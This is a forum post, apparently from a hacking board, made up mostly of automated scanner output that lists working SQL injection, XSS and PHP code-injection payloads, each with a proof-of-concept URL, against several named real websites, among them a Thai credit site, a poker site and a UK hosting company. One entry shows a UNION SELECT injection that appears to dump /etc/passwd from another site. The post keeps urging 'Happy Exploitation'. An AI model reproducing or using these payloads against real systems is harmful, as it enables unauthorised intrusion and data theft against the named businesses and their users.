Thai Credit Centr And Some More!!!

Red Kat · #1 01-14-2025, 04:45 AM

http://www.thaicredit-center.com/pro...duct_id=172%27
D:\Inetpub\vhosts\creditsanook.com\httpdocs\produc t_detail.php
[!] Fingerprinting the backend Technologies.
[!] Status code: 200 OK
[!] Host: http://www.thaicredit-center.com
[!] WebServer: Microsoft-IIS/7.5
[!] x-powered-by
[!] PHP/5.2.17, ASP.NET
[!] Now Scanning for Remote Code/Command Execution
[!] Covering Linux & Windows Operating Systems
[!] Please wait ....
[!] Target is not vulnerable!
[!] Now Scanning for XSS
[!] Please wait ....
[!] Target is not vulnerable!
[!] Now Scanning for Error Based SQL Injection
[!] Covering MySQL, Oracle, MSSQL, MSACCESS & PostGreSQL Databases
[!] Please wait ....[*] Payload Found . . .[*] Payload: 3'
[!] Code Snippet: <b>Warning</b>: mssql_query() [<a href='function.mssql-query'>function.mssql-query</a>]: message: Line 1: Incorrect syntax near '\'. (severity 15) in <b>D:\Inetpub\vhosts\creditsanook.com\httpdocs\p ro duct_detail.php</b> on line <b>32</b><br />[*] POC: http://www.thaicredit-center.com/pro...uct_id=172%273'[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%5c
[!] Code Snippet: <b>Warning</b>: mssql_query() [<a href='function.mssql-query'>function.mssql-query</a>]: message: Line 1: Incorrect syntax near '\'. (severity 15) in <b>D:\Inetpub\vhosts\creditsanook.com\httpdocs\p ro duct_detail.php</b> on line <b>32</b><br />[*] POC: http://www.thaicredit-center.com/pro..._id=172%273%5c[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%5c
[!] Code Snippet: <b>Warning</b>: mssql_query() [<a href='function.mssql-query'>function.mssql-query</a>]: message: Unclosed quotation mark before the character string '3\\'. (severity 15) in <b>D:\Inetpub\vhosts\creditsanook.com\httpdocs\p ro duct_detail.php</b> on line <b>32</b><br />[*] POC: http://www.thaicredit-center.com/pro..._id=172%273%5c[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%27%22%28%29
[!] Code Snippet: <b>Warning</b>: mssql_query() [<a href='function.mssql-query'>function.mssql-query</a>]: message: Line 1: Incorrect syntax near '\'. (severity 15) in <b>D:\Inetpub\vhosts\creditsanook.com\httpdocs\p ro duct_detail.php</b> on line <b>32</b><br />[*] POC: http://www.thaicredit-center.com/pro...73%27%22%28%29[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%27%22%28%29
[!] Code Snippet: <b>Warning</b>: mssql_query() [<a href='function.mssql-query'>function.mssql-query</a>]: message: Unclosed quotation mark before the character string '()'. (severity 15) in <b>D:\Inetpub\vhosts\creditsanook.com\httpdocs\p ro duct_detail.php</b> on line <b>32</b><br />[*] POC: http://www.thaicredit-center.com/pro...73%27%22%28%29[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3'><
[!] Code Snippet: <b>Warning</b>: mssql_query() [<a href='function.mssql-query'>function.mssql-query</a>]: message: Line 1: Incorrect syntax near '\'. (severity 15) in <b>D:\Inetpub\vhosts\creditsanook.com\httpdocs\p ro duct_detail.php</b> on line <b>32</b><br />[*] POC: http://www.thaicredit-center.com/product_detail.php?product_id=172%273'><[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%25 00%3E%25bf%2527%27
[!] Code Snippet: <b>Warning</b>: mssql_query() [<a href='function.mssql-query'>function.mssql-query</a>]: message: Line 1: Incorrect syntax near '\'. (severity 15) in <b>D:\Inetpub\vhosts\creditsanook.com\httpdocs\p ro duct_detail.php</b> on line <b>32</b><br />[*] POC: http://www.thaicredit-center.com/pro...E%25bf%2527%27[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%25 00%3E%25bf%2527%27
[!] Code Snippet: <b>Warning</b>: mssql_query() [<a href='function.mssql-query'>function.mssql-query</a>]: message: Unclosed quotation mark before the character string ');|]*{%0d%0a<%00>%bf%27\''. (severity 15) in <b>D:\Inetpub\vhosts\creditsanook.com\httpdocs\p ro duct_detail.php</b> on line <b>32</b><br />[*] POC: http://www.thaicredit-center.com/pro...E%25bf%2527%27[*] Happy Exploitation

[!] Congratulations you've found 8 bugs :-)
[!] Fingerprinting the backend Technologies.
[!] Status code: 200 OK
[!] Host: http://www.pokerfreerollsonline.com
[!] WebServer: Apache
[!] x-powered-by
[!] PHP/5.2.17
[!] Now Scanning for Remote Code/Command Execution
[!] Covering Linux & Windows Operating Systems
[!] Please wait ....
[!] Target is not vulnerable!
[!] Now Scanning for XSS
[!] Please wait ....[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <li><a href="fullreview.php?id=absolute'x"x>x&freerollid= 0">Today </a></li>[*] POC: http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <li><a href="fullreview.php?id=absolute'x"x>x&freerollid= 1"> Tuesday</a></li>[*] POC: http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <li><a href="fullreview.php?id=absolute'x"x>x&freerollid= 2"> Wednesday</a></li>[*] POC: http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <li><a href="fullreview.php?id=absolute'x"x>x&freerollid= 3"> Thursday</a></li>[*] POC: http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <li><a href="fullreview.php?id=absolute'x"x>x&freerollid= 4"> Friday</a></li>[*] POC: http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <li><a href="fullreview.php?id=absolute'x"x>x&freerollid= 5"> Saturday</a></li>[*] POC: http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <li><a href="fullreview.php?id=absolute'x"x>x&freerollid= 6"> Sunday</a></li>[*] POC: http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <td width="168px"><a href="freerolls.php?sort=sa&id=absolute'x"x>x">Pok er Site</a></td>[*] POC: http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <td width="113px"><a href="freerolls.php?sort=td&id=absolute'x"x>x" class="boldred6">Reg. Time</a> </td>[*] POC: http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <td width="70px"><a href="freerolls.php?sort=ra&id=absolute'x"x>x" >Start Time</a></td>[*] POC: http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <td width="100px"><a href="freerolls.php?sort=pa&id=absolute'x"x>x" >Prize</a></td>[*] POC: http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <td width="80px"><a href="freerolls.php?sort=ga&id=absolute'x"x>x">Gam e Type</a></td>[*] POC: http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <td width="143px"><a href="freerolls.php?sort=ma&id=absolute'x"x>x">Max Players</a></td>[*] POC: http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <td width="130px"><a href="freerolls.php?sort=ba&id=absolute'x"x>x">Res trictions</a></td>[*] POC: http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[!] Congratulations you've found 14 bugs :-)
[!] Now Scanning for Error Based SQL Injection
[!] Covering MySQL, Oracle, MSSQL, MSACCESS & PostGreSQL Databases
[!] Please wait ....
[!] Target is not vulnerable!
http://onlinesales.priyafoods.com/pr...hp?id=999999.9' union all select 1,2,[t],4,5 and '0'='0 root
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
[!] Enter the URL: http://www.d-ranking.com/shop.php?id=1
[!] Fingerprinting the backend Technologies.
[!] Status code: 200 OK
[!] Host: http://www.d-ranking.com
[!] WebServer: Apache/2.0.55 (Unix) PHP/4.4.2
[!] x-powered-by
[!] PHP/4.4.2
[!] Now Scanning for Remote Code/Command Execution
[!] Covering Linux & Windows Operating Systems
[!] Please wait ....
[!] Target is not vulnerable!
[!] Now Scanning for XSS
[!] Please wait ....[*] Payload Found . . .[*] Payload: %27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0% 2F%29%3Eweb
[!] Code Snippet: ERROR!! fileName:/var/www/virtualhost/www.d-ranking.com/shop.php/LINE:68/ERROR:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''>zigoo0<svg/onload=confirm(/zigoo0/)>web ORDER BY `id` ASC' at line 1[*] POC: http://www.d-ranking.com/shop.php?id...o0%2F%29%3Eweb[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: ERROR!! fileName:/var/www/virtualhost/www.d-ranking.com/shop.php/LINE:68/ERROR:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"x>x ORDER BY `id` ASC' at line 1[*] POC: http://www.d-ranking.com/shop.php?id=1%78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0% 2F%29%3Eweb
[!] Code Snippet: ERROR!! fileName:/var/www/virtualhost/www.d-ranking.com/shop.php/LINE:68/ERROR:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '">zigoo0<svg/onload=confirm(/zigoo0/)>web ORDER BY `id` ASC' at line 1[*] POC: http://www.d-ranking.com/shop.php?id...o0%2F%29%3Eweb[*] Happy Exploitation

[!] Congratulations you've found 3 bugs :-)
[!] Now Scanning for Error Based SQL Injection
[!] Covering MySQL, Oracle, MSSQL, MSACCESS & PostGreSQL Databases
[!] Please wait ....[*] Payload Found . . .[*] Payload: 3'
[!] Code Snippet: ERROR!! fileName:/var/www/virtualhost/www.d-ranking.com/shop.php/LINE:68/ERROR:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY `id` ASC' at line 1[*] POC: http://www.d-ranking.com/shop.php?id=13'[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%5c
[!] Code Snippet: ERROR!! fileName:/var/www/virtualhost/www.d-ranking.com/shop.php/LINE:68/ERROR:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\ ORDER BY `id` ASC' at line 1[*] POC: http://www.d-ranking.com/shop.php?id=13%5c[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%27%22%28%29
[!] Code Snippet: ERROR!! fileName:/var/www/virtualhost/www.d-ranking.com/shop.php/LINE:68/ERROR:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''"() ORDER BY `id` ASC' at line 1[*] POC: http://www.d-ranking.com/shop.php?id=13%27%22%28%29[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3'><
[!] Code Snippet: ERROR!! fileName:/var/www/virtualhost/www.d-ranking.com/shop.php/LINE:68/ERROR:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''>< ORDER BY `id` ASC' at line 1[*] POC: http://www.d-ranking.com/shop.php?id=13'><[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%25 00%3E%25bf%2527%27
[!] Code Snippet: ERROR!! fileName:/var/www/virtualhost/www.d-ranking.com/shop.php/LINE:68/ERROR:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"\'\");|]*{%0d%0a<%00>%bf%27' ORDER BY `id` ASC' at line 1[*] POC: http://www.d-ranking.com/shop.php?id...E%25bf%2527%27[*] Happy Exploitation

[!] Congratulations you've found 5 bugs :-)
[!] Enter the URL: https://www.squirrelhosting.co.uk/ho...info.php?id=94
[!] Fingerprinting the backend Technologies.
[!] Status code: 200 OK
[!] Host: http://www.squirrelhosting.co.uk
[!] WebServer: Apache/2.4.23 (Unix)
[!] x-powered-by
[!] PHP/5.6.25
[!] Now Scanning for Remote Code/Command Execution
[!] Covering Linux & Windows Operating Systems
[!] Please wait ....[*] Payload Found . . .[*] Payload: ;${@print(md5(zigoo0))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5(zigoo0))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5(zigoo0))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li> <label for="oneclick" class="toggle-sub" onClick="">View 1 Click Installs <span class="toggleright">►</span></label> <input type="checkbox" id="oneclick" class="sub-nav-check"/> <ul id="fof-sub" class="sub-nav"> <li class="sub-heading"> <label for="oneclick" class="toggle" onClick="" title="Back">◄</label> </li><li><a href="/hosting/1-click-install-hosting.php">1 Click installs overview</a></li><li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5(zigoo0))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5(zigoo0))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting</a>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5(zigoo0))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5(zigoo0))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5(zigoo0))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5(zigoo0))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li><a href="/hosting/1-click-install-hosting.php">View 1 Click Installs</a> <ul> <li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5(zigoo0))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5(zigoo0))}
[!] Code Snippet: <div id="footer"> <div id="ninesixzero"> <div id="footerblockleftone"> <h6 class="footerheadersix">Domains & UK Hosting</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/domain-names/domain-name-registration.php">Domain Names</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/linux-hosting-packages.php">Web Hosting</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/virtual-private-servers/order-vps.php">Virtual Servers</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact us</a></li></ul> </div><div id="footerblocklefttwo"> <h6 class="footerheadersix">Resources</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/1-click-install-hosting.php">Free Scripts & 1 Click Installs</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog.php" >Hosting Blog</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms and Conditions</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a></li></ul> </div><div id="footerblockleftthree"><h6 class="footerheadersix">Social</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.facebook.com/SquirrelHosting">Facebook</a></li><li class="footerli"><a href="https://twitter.com/squirrelhosting">Twitter</a></li><li class="footerli"><a href="https://plus.google.com/111473460656603282963">Find us on Google+</a></li></ul></div><div id="footerblocklast"> <h6 class="footerheadersix">Additional Information</h6> <ul class="footerul"> <li class="footerlinobullet"> <span class="cards"><img id="creditcardsfooter" src="/img_trans.png" height="1" width="1" alt="Payment Cards Accepted"/></span></a></li><li class="footerlinobullet"> <table class="veritable" cellspacing=0 cellpadding=0 title="CLICK TO VERIFY: This site uses a GlobalSign SSL Certificate to secure your personal information." > <tr> <td align="center"><span id="ss_img_wrapper_gmogs_image_125-50_en_white"><a href="https://www.globalsign.co.uk/" target=_blank title="GlobalSign Site Seal" rel="nofollow"><img alt="SSL" border=0 id="ss_img" src="//seal.globalsign.com/SiteSeal/images/gmogs_image_125-50_en_white.png"></a></span><script defer type="text/javascript" src="//seal.globalsign.com/SiteSeal/gmogs_image_125-50_en_white.js"></script></td></tr></table> </li></ul> </div></div></div><div id="bottomfooter"> <div id="ninesixzero"> <div id="footerbottomleft">© Copyright 2014 | Squirrel Hosting Limited<br/> Company Number 9031308</div><div id="footerbottomright"> <a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact</a> | <a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a> | <a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms & Conditions</a></div><div id="footerbottomcenter"></div></div></div>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5(zigoo0))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5("zigoo0"))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5("zigoo0"))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5("zigoo0"))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li> <label for="oneclick" class="toggle-sub" onClick="">View 1 Click Installs <span class="toggleright">►</span></label> <input type="checkbox" id="oneclick" class="sub-nav-check"/> <ul id="fof-sub" class="sub-nav"> <li class="sub-heading"> <label for="oneclick" class="toggle" onClick="" title="Back">◄</label> </li><li><a href="/hosting/1-click-install-hosting.php">1 Click installs overview</a></li><li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5("zigoo0"))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5("zigoo0"))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting</a>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5("zigoo0"))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5("zigoo0"))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5("zigoo0"))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5("zigoo0"))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li><a href="/hosting/1-click-install-hosting.php">View 1 Click Installs</a> <ul> <li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5("zigoo0"))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5("zigoo0"))}
[!] Code Snippet: <div id="footer"> <div id="ninesixzero"> <div id="footerblockleftone"> <h6 class="footerheadersix">Domains & UK Hosting</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/domain-names/domain-name-registration.php">Domain Names</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/linux-hosting-packages.php">Web Hosting</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/virtual-private-servers/order-vps.php">Virtual Servers</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact us</a></li></ul> </div><div id="footerblocklefttwo"> <h6 class="footerheadersix">Resources</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/1-click-install-hosting.php">Free Scripts & 1 Click Installs</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog.php" >Hosting Blog</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms and Conditions</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a></li></ul> </div><div id="footerblockleftthree"><h6 class="footerheadersix">Social</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.facebook.com/SquirrelHosting">Facebook</a></li><li class="footerli"><a href="https://twitter.com/squirrelhosting">Twitter</a></li><li class="footerli"><a href="https://plus.google.com/111473460656603282963">Find us on Google+</a></li></ul></div><div id="footerblocklast"> <h6 class="footerheadersix">Additional Information</h6> <ul class="footerul"> <li class="footerlinobullet"> <span class="cards"><img id="creditcardsfooter" src="/img_trans.png" height="1" width="1" alt="Payment Cards Accepted"/></span></a></li><li class="footerlinobullet"> <table class="veritable" cellspacing=0 cellpadding=0 title="CLICK TO VERIFY: This site uses a GlobalSign SSL Certificate to secure your personal information." > <tr> <td align="center"><span id="ss_img_wrapper_gmogs_image_125-50_en_white"><a href="https://www.globalsign.co.uk/" target=_blank title="GlobalSign Site Seal" rel="nofollow"><img alt="SSL" border=0 id="ss_img" src="//seal.globalsign.com/SiteSeal/images/gmogs_image_125-50_en_white.png"></a></span><script defer type="text/javascript" src="//seal.globalsign.com/SiteSeal/gmogs_image_125-50_en_white.js"></script></td></tr></table> </li></ul> </div></div></div><div id="bottomfooter"> <div id="ninesixzero"> <div id="footerbottomleft">© Copyright 2014 | Squirrel Hosting Limited<br/> Company Number 9031308</div><div id="footerbottomright"> <a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact</a> | <a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a> | <a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms & Conditions</a></div><div id="footerbottomcenter"></div></div></div>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5("zigoo0"))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %253B%2524%257B%2540print%2528md5%2528%2522zigoo0% 2522%2529%2529%257D%253B
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...2529%257D%253B[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %253B%2524%257B%2540print%2528md5%2528%2522zigoo0% 2522%2529%2529%257D%253B
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li> <label for="oneclick" class="toggle-sub" onClick="">View 1 Click Installs <span class="toggleright">►</span></label> <input type="checkbox" id="oneclick" class="sub-nav-check"/> <ul id="fof-sub" class="sub-nav"> <li class="sub-heading"> <label for="oneclick" class="toggle" onClick="" title="Back">◄</label> </li><li><a href="/hosting/1-click-install-hosting.php">1 Click installs overview</a></li><li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...2529%257D%253B[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %253B%2524%257B%2540print%2528md5%2528%2522zigoo0% 2522%2529%2529%257D%253B
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting</a>[*] POC: https://www.squirrelhosting.co.uk/ho...2529%257D%253B[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %253B%2524%257B%2540print%2528md5%2528%2522zigoo0% 2522%2529%2529%257D%253B
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...2529%257D%253B[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %253B%2524%257B%2540print%2528md5%2528%2522zigoo0% 2522%2529%2529%257D%253B
